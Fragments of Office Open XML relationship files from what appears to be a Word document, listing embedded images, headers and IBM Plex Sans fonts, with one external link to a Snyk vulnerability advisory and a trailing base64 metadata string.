Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-14089788" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18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BMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular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4.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19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8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30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yKiII8NFvecqdP1SKrY+XJaK8HQ==">CgMxLjAyDmgucm9hNndmam5oaG1xMg5oLnA5Zmk2ZGZ1cmRpMDIOaC4yZ3NpN2E1c2l5dzAyDmguaGZ6dXk3ejVjMzVtMg5oLmJ5MnlzOWFyZ28xODIOaC4zd3lxeGtoenZwMW04AHIhMVB1WXNnd1dESm5YUmpPTG9qbXNHTTk4QWlkX0daNG5a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